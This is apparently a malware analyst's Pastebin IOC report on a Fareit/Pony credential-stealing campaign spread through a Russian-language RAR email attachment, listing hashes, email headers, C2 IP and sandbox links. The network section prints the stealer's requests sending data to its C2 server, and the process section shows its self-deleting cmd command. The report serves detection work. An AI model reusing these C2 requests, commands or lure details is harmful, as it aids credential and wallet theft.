SHARE
TWEET

#fareit_200919

VRad Sep 23rd, 2019 (edited) 1,938 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #fareit #pony #RARv5
  2.  
  3. https://pastebin.com/nDTPH9DF
  4.  
  5. previous_contact:
  6. 27/02/19    https://pastebin.com/wyRGBXfj
  7. 18/10/18    https://pastebin.com/u0D14L5r
  8.  
  9. FAQ:
  10. https://radetskiy.wordpress.com/?s=fareit
  11.  
  12. attack_vector
  13. --------------
  14. email attach .RAR > exe > grab info and remove itself
  15.  
  16. email_headers
  17. --------------
  18. Received: from mail.tvema.ru (unknown [212.233.112.11])
  19. Received: from li1376-249.members.linode.com (li1376-249.members.linode.com [139.162.213.249])  by mail.tvema.ru (Postfix)
  20. Reply-To: Дарья Горшкова <AntonovaMarina54@rambler.ru>
  21. From: Дарья Горшкова <NovikovaNA@mail.tvema.ru>
  22. To: <user1@victim0>
  23. Subject: Проверить договор за август
  24. Date: Thu, 19 Sep 2019 22:38:42 -0700
  25. Return-Path: NovikovaNA@mail.tvema.ru
  26.  
  27. files
  28. --------------
  29. SHA-256     1715dc2a0dbd94dff9593528b6cb0e2de90fd3b96b2fd994edd6d7b351b2260a
  30. File name   Проект договора 20.09.2019.001        [RAR archive data, vbe, os: Unix]
  31. File size   54.6 KB (55915 bytes)
  32.  
  33. SHA-256     01a715c34f00d0488b9e1211bf67da8809bc2ff109ea09419c83edfb881b51c8
  34. File name   Проект договора 20.09.2019.exe        [PE32 executable (GUI) Intel 80386, for MS Windows]
  35. File size   121 KB (123904 bytes)
  36.  
  37. SHA-256     b8a2e0a50c878315fcfa40e2ca39e11fbba6d4b5818095d37a472e20a1232174
  38. File name   get [ASCII Pascal program text, with very long lines]
  39. File size   194.87 KB (199544 bytes)
  40.  
  41. activity
  42. **************
  43.  
  44. + Collects information about installed applications
  45. + Attempts to access Bitcoin/ALTCoin wallets
  46. + Harvests credentials from local FTP client softwares
  47. + Harvests information related to installed mail clients
  48.  
  49. PL_SCR  attached RAR               
  50.  
  51. C2  78.108.216.39
  52.  
  53. netwrk
  54. --------------
  55. [ssl]
  56. 104.16.54.3 blockchain.info     Client Hello
  57. 54.164.0.55 api.blockcypher.com Client Hello   
  58.  
  59. [http]
  60. 78.108.216.39       78.108.216.39   GET     /index.php?id=0&un=6f70657261746f72&cn=41504d3131   HTTP/1.1    WinHttp.WinHttpRequest.5.1
  61. 78.108.216.39       78.108.216.39   POST    /g_38472341.php                     HTTP/1.0    Mozilla/4.0
  62. 78.108.216.39       78.108.216.39   GET     /index.php?id=0&un=6f70657261746f72&cn=41504d3131   HTTP/1.1    WinHttp.WinHttpRequest.5.1
  63. 78.108.216.39       78.108.216.39   POST    /g_38472341.php                     HTTP/1.0    Mozilla/4.0
  64.  
  65. comp
  66. --------------
  67. Проект договора 20.09.2019.exe    3044    TCP 104.16.54.3 443 ESTABLISHED            
  68. Проект договора 20.09.2019.exe    3044    TCP 78.108.216.39   80  ESTABLISHED            
  69.  
  70.  
  71. proc
  72. --------------
  73. C:\Users\operator\Desktop\Проект договора 20.09.2019.exe
  74. "C:\Users\operator\Desktop\Проект договора 20.09.2019.exe" dfsr
  75. cmd.exe /c ping 127.0.0.1 & del /F /Q "C:\Users\operator\Desktop\Проект договора 20.09.2019.exe"
  76. C:\Windows\system32\PING.EXE ping  127.0.0.1
  77.  
  78. persist
  79. --------------
  80. no persist
  81.  
  82. drop
  83. --------------
  84. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Cookies\7QU78IEN.txt
  85.  
  86. content:
  87. __cfduid
  88. d03b5687a15aabc7b04176f913db271801569250027
  89. blockchain.info/
  90. 9216
  91. 1044408192
  92. 30839023
  93. 1812624219
  94. 30761340
  95. *
  96.  
  97. # # #
  98. https://www.virustotal.com/gui/file/1715dc2a0dbd94dff9593528b6cb0e2de90fd3b96b2fd994edd6d7b351b2260a/details
  99. https://www.virustotal.com/gui/file/01a715c34f00d0488b9e1211bf67da8809bc2ff109ea09419c83edfb881b51c8/details
  100. https://analyze.intezer.com/#/analyses/88b5a596-bd4c-41ec-93fb-b44a46bdc98a
  101.  
  102. https://www.virustotal.com/gui/file/b8a2e0a50c878315fcfa40e2ca39e11fbba6d4b5818095d37a472e20a1232174/details
  103. https://analyze.intezer.com/#/analyses/3aad1fd6-3435-466f-ab84-26a0ce9b0fe7
  104.  
  105. VR
  106.  
  107. @
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top